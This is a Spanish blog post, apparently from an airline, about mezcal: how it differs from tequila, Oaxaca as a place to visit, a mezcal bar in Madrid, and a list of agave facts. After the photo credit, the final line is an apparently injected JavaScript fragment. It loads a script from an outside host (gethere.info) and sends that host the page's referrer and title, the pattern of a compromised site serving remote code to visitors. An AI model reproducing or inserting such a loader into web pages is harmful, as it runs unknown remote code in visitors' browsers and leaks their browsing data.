Oaxaca y su poderoso mezcal

04/03/2016

Mezcal

¿Mezcal? Seguramente a muchos os suene a chino esto de mezcal. Pero, a que si decimos tequila, ¿la mayoría sabéis de qué estamos hablando? Efectivamente, esto es lo que ha estado sucediendo durante mucho tiempo. El tequila se lleva la fama y los momentos de gloria, y el mezcal, pese a su poderío, ha estado siempre a la sombra del primero. Sin embargo parece que ahora la cosa empieza a cambiar y el mezcal empieza a estar de moda.

Podría decirse que el mezcal es un aguardiente obtenido por destilación de la cabeza del agave. Este proceso se lleva a cabo en destilerías destinadas a tal asunto, estando las mejores de todo el mundo en el sur de México. En uno de los rincones más recónditos y bonitos del país: en Oaxaca, como nuestro nuevo avión. Si en alguna ocasión viajáis a México os recomendamos acercaros hasta este punto. Es uno de esos lugares que encandilan y conquistan a todo aquel que lo visita. Además, lejos de la muchedumbre turística de otros lugares, en Oaxaca se sigue respirando una autenticidad mexicana como en pocos lugares. Huele al México más puro y simple y a la vez, al más colorido.

Las mejores destilerías las encontramos en Oaxaca. Pero no son las únicas. Incluso fuera de las fronteras mexicanas podemos encontrar ya ejemplos decentes. Sin ir más lejos, en Madrid existe una. El Mezcal Lab, va de la mano del Punto MX -por cierto, primer restaurante mexicano en Europa que ha conseguido una Estrella Michelín-, y allí nos encontramos con un paraíso de mezcales únicos en Europa, siendo la joya de la corona el mezcal Ojo de Dios.

Para los más empollones en el tema, os dejamos más datos de interés:

  • Tanto el mezcal como el tequila proceden de una planta llamada agave o maguey. Dicho de otro modo, el agave es al mezcal o al tequila, lo que la uva es al vino.
  • El proceso de elaboración del mezcal es mucho más cuidado y artesanal que el del tequila.
  • La complejidad aromática del mezcal es rotunda.
  • Existen hasta 20 tipos diferentes de agaves o magueys permitidos. Todos aportan sabores bien diferentes entre sí.
  • Nunca olvidéis este dicho tan típicamente mexicano: para todo mal, mezcal, para todo bien, también 🙂 .

 Foto | Aaron Rodriguez

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;